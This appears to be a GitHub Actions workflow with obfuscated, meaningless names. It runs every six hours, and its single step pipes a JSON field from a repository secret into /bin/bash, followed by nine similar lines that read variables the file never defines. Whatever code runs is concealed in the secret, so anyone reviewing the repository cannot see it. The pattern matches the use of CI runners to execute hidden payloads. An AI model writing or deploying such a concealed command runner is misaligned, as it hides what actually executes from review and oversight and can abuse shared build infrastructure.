name: tulinglong4318

on:
  workflow_dispatch:
  schedule:
    - cron: '54 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tulinglong4318
        env:
          lvky20: ${{ secrets.lvky20 }}
        run: |
          echo $lvky20 | jq -r .vs3 | /bin/bash
          echo $qj27 | jq -r .p73830 | /bin/bash
          echo $r84 | jq -r .fr7281 | /bin/bash
          echo $u0982 | jq -r .vd5056 | /bin/bash
          echo $so882 | jq -r .bb3199 | /bin/bash
          echo $ccm890 | jq -r .eqnul8 | /bin/bash
          echo $ym58 | jq -r .vo9198 | /bin/bash
          echo $wqld9 | jq -r .ot96554 | /bin/bash
          echo $tvsd5025 | jq -r .fepsj7014 | /bin/bash
          echo $hju23 | jq -r .binq38381 | /bin/bash

